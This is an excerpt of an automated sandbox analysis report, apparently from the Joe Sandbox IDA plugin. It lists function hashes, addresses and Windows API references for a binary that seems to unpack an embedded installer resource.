Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 7f5de6d9a62737e66b17ba63748b328ff72035a9543725c4e3a1d6aedf708760
Instruction ID: 6e434cc3a35927b27788c62522e2615a5ae90c2018c858eccf75f1c76ad305bf
Opcode Fuzzy Hash: 7f5de6d9a62737e66b17ba63748b328ff72035a9543725c4e3a1d6aedf708760
Instruction Fuzzy Hash: 9EB012D235C1016D3919B11B5E03E76264CD1C0B10330442EF000C5041D8848C423433

Uniqueness

Uniqueness Score: -1.00%

Function 00F99CC7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: c192b3f7141ce51050d8a99d1c7a66e59ae9783cc3abfeb4de8bd2db5c510b2e
Instruction ID: 73113e61498a304b86c5ed86cf0e31fdd1ceb37362a55abeb49a4344df318c7e
Opcode Fuzzy Hash: c192b3f7141ce51050d8a99d1c7a66e59ae9783cc3abfeb4de8bd2db5c510b2e
Instruction Fuzzy Hash: A3B012C235C2016D3919B11B1C03E76264CC1C0B10330452EF000C5041D8808C813577

Uniqueness

Uniqueness Score: -1.00%

Function 00F99CBD Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 258957dd096852645e9d91cb609a9fb7ffe4c830d4b3abb3c288d48411ccdf52
Instruction ID: a2b6185eb10099a3bd4dcd3dc433f8d00484d0beda3f34540df9cba10a458f6c
Opcode Fuzzy Hash: 258957dd096852645e9d91cb609a9fb7ffe4c830d4b3abb3c288d48411ccdf52
Instruction Fuzzy Hash: 2FB012C325C2017D3948B51B1C03E76268CD1C0B10330482FF000C5145D8808C013433

Uniqueness

Uniqueness Score: -1.00%

Function 00F99CB3 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: e5f1d8c6fd9a42c79ce4db9a538eee7fa82ed015f863d834a2fcc37adcf915f1
Instruction ID: f632a0a1175ec5474032b609fc9f1540c23d358703671fd3b4362ef047967973
Opcode Fuzzy Hash: e5f1d8c6fd9a42c79ce4db9a538eee7fa82ed015f863d834a2fcc37adcf915f1
Instruction Fuzzy Hash: 36B012C225C2016D3908B12B1C03E76268CC2C0B103308C2EF400C5146D9808C013433

Uniqueness

Uniqueness Score: -1.00%

Function 00F99CA9 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 80c658d5bd483e2849d29bcfd36ff850f449047936b5b5bc8b505d30fa52ff6d
Instruction ID: fc0369b2ac3805ce44f61dbce2e7832cda1a8e213198234a9c03e2f452e0f484
Opcode Fuzzy Hash: 80c658d5bd483e2849d29bcfd36ff850f449047936b5b5bc8b505d30fa52ff6d
Instruction Fuzzy Hash: B2B012C225C3016D3908B11B1C03E76268CC1C0B10330492EF000C5145D880CC413537

Uniqueness

Uniqueness Score: -1.00%

Function 00F99C9F Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 7221b1821caf3e02c8c99effac184b9bc8685e0e2f966e061e0923a72c9ebcb0
Instruction ID: c43dda100b545286aa3d1913ec0f93b3644da82616975e18799dd75847512569
Opcode Fuzzy Hash: 7221b1821caf3e02c8c99effac184b9bc8685e0e2f966e061e0923a72c9ebcb0
Instruction Fuzzy Hash: 28B012E225C2016E3908B11B1E03E7626CCD1C0B10330482EF000C5145D8848C023433

Uniqueness

Uniqueness Score: -1.00%

Function 00F99C84 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 192d2e0eb5330209b68401f966136b2567cf68bfff0d32d32584dbbbc9eac946
Instruction ID: 89f9788adac28bb7b657ea774f1ad9064d19649b296c90f3bd928009b92eef14
Opcode Fuzzy Hash: 192d2e0eb5330209b68401f966136b2567cf68bfff0d32d32584dbbbc9eac946
Instruction Fuzzy Hash: 16B012C235C1057D391972171E03D76260DC1C0B10330892EF400C404298808C413433

Uniqueness

Uniqueness Score: -1.00%

Function 00F99D6B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99D62

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 1e44271782131fe14cc91018650e081d20faf60749ccd82dfd105f7f5335dbd9
Instruction ID: f3429c810a4cd41f27f1ef3ebf2eea43c409860283ba9290b8d2c07eb1545ca2
Opcode Fuzzy Hash: 1e44271782131fe14cc91018650e081d20faf60749ccd82dfd105f7f5335dbd9
Instruction Fuzzy Hash: DCB012C225C1007E3944911A2D02EB6130CD0C0B10330441FF404C4055D8818C013533

Uniqueness

Uniqueness Score: -1.00%

Function 00F99D50 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99D62

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: f6464e6df0b81a6ec1dd4dd49ceee1cc9f349f2983c5b7bf15202c70d4bbed8e
Instruction ID: 071b9736f1d2fc2eec51ff31a600ead8fe2e5dbb2c878856a223f6610fabdf48
Opcode Fuzzy Hash: f6464e6df0b81a6ec1dd4dd49ceee1cc9f349f2983c5b7bf15202c70d4bbed8e
Instruction Fuzzy Hash: 8FB012C226C2007D390451162D02DB6130CD0C0B51330461FF501C405598818C413537

Uniqueness

Uniqueness Score: -1.00%

Function 00F99D03 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: d6630515b223a2b49963dc1d8482930aa585f5d2a22f4649e752798a1d0b5a8d
Instruction ID: a43ae990db665da13925225ce4de4b808bb6d5d373d7895606cd5ecff8f724f1
Opcode Fuzzy Hash: d6630515b223a2b49963dc1d8482930aa585f5d2a22f4649e752798a1d0b5a8d
Instruction Fuzzy Hash: FDB0128225C2016C3908B16B1C03F76124DD1C0B10330853EF010C1041D8804C813433

Uniqueness

Uniqueness Score: -1.00%

Function 00F99CFE Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 40cf506c7f9ecfa0b0b08f1410e36e5c1aa0a977c04e82e173253230677aea0b
Instruction ID: 08838a18261509e2f7ab30ce9cffc0f245af30e60cee820b987f1d3a75c2d5a4
Opcode Fuzzy Hash: 40cf506c7f9ecfa0b0b08f1410e36e5c1aa0a977c04e82e173253230677aea0b
Instruction Fuzzy Hash: 99A011822AC202BC3808B2222C03E3A220CC0C0BA0330882EF00280080A88008023032

Uniqueness

Uniqueness Score: -1.00%

Function 00F99CF4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 4af19477d982190dba66af06bfb969b659de88bc0e00217298cc9330e36c4358
Instruction ID: 08838a18261509e2f7ab30ce9cffc0f245af30e60cee820b987f1d3a75c2d5a4
Opcode Fuzzy Hash: 4af19477d982190dba66af06bfb969b659de88bc0e00217298cc9330e36c4358
Instruction Fuzzy Hash: 99A011822AC202BC3808B2222C03E3A220CC0C0BA0330882EF00280080A88008023032

Uniqueness

Uniqueness Score: -1.00%

Function 00F99D8E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99D62

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 8b5f77282b7b9ac4f0e0eb89eb1b31e5c065b13bb0a2aa44d2fb7dce07926e73
Instruction ID: c38e79e0de2e4945ebbefb27964fa745a86ccdac664f12c2e5f402fea8d0c389
Opcode Fuzzy Hash: 8b5f77282b7b9ac4f0e0eb89eb1b31e5c065b13bb0a2aa44d2fb7dce07926e73
Instruction Fuzzy Hash: C0A011822AC202BC3808A2222E02EBA020CC0C0BA0330880EF802800A8A88008023033

Uniqueness

Uniqueness Score: -1.00%

Function 00F99D84 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99D62

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 414f164ee82af80219ecadb7609b39661122b6df86ee78e4e0f56f234357e1de
Instruction ID: c38e79e0de2e4945ebbefb27964fa745a86ccdac664f12c2e5f402fea8d0c389
Opcode Fuzzy Hash: 414f164ee82af80219ecadb7609b39661122b6df86ee78e4e0f56f234357e1de
Instruction Fuzzy Hash: C0A011822AC202BC3808A2222E02EBA020CC0C0BA0330880EF802800A8A88008023033

Uniqueness

Uniqueness Score: -1.00%

Function 00F99D7A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99D62

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 53a55a8e5dcda675963824fb72c9b0c481eeaeb51908e2d3de306f3d6ee759ce
Instruction ID: c38e79e0de2e4945ebbefb27964fa745a86ccdac664f12c2e5f402fea8d0c389
Opcode Fuzzy Hash: 53a55a8e5dcda675963824fb72c9b0c481eeaeb51908e2d3de306f3d6ee759ce
Instruction Fuzzy Hash: C0A011822AC202BC3808A2222E02EBA020CC0C0BA0330880EF802800A8A88008023033

Uniqueness

Uniqueness Score: -1.00%

Function 00F99D1C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: bfe9d53ad947b5fdd1e8e54c4e53d8992d370948a9531c570ea68d2b231e6697
Instruction ID: 08838a18261509e2f7ab30ce9cffc0f245af30e60cee820b987f1d3a75c2d5a4
Opcode Fuzzy Hash: bfe9d53ad947b5fdd1e8e54c4e53d8992d370948a9531c570ea68d2b231e6697
Instruction Fuzzy Hash: 99A011822AC202BC3808B2222C03E3A220CC0C0BA0330882EF00280080A88008023032

Uniqueness

Uniqueness Score: -1.00%

Function 00F99D12 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 2cca2e72120d6f1426ebe8eeae4f1672171416f18954bd8cc14e65dc3ada22d6
Instruction ID: 08838a18261509e2f7ab30ce9cffc0f245af30e60cee820b987f1d3a75c2d5a4
Opcode Fuzzy Hash: 2cca2e72120d6f1426ebe8eeae4f1672171416f18954bd8cc14e65dc3ada22d6
Instruction Fuzzy Hash: 99A011822AC202BC3808B2222C03E3A220CC0C0BA0330882EF00280080A88008023032

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F96702 Relevance: 60.0, APIs: 22, Strings: 12, Instructions: 473fileprocesssynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000), ref: 00F967C7
GetTempFileNameW.KERNEL32(00000000,Squirrel,00000000,?), ref: 00F967EB
DeleteFileW.KERNEL32(?), ref: 00F96800
PathIsUNCW.SHLWAPI(00000000), ref: 00F96807
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F96852
GetLastError.KERNEL32 ref: 00F96860
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F9696A
GetLastError.KERNEL32 ref: 00F96978
FindResourceW.KERNEL32(00000083,DATA), ref: 00F96A03
LoadResource.KERNEL32(00000000), ref: 00F96A20
SizeofResource.KERNEL32(00000000), ref: 00F96A44
LockResource.KERNEL32(00000000), ref: 00F96A59
DeleteFileW.KERNEL32(?), ref: 00F96B25
FreeResource.KERNEL32(00000000), ref: 00F96BE0
GetFileAttributesW.KERNEL32(?), ref: 00F96C1B
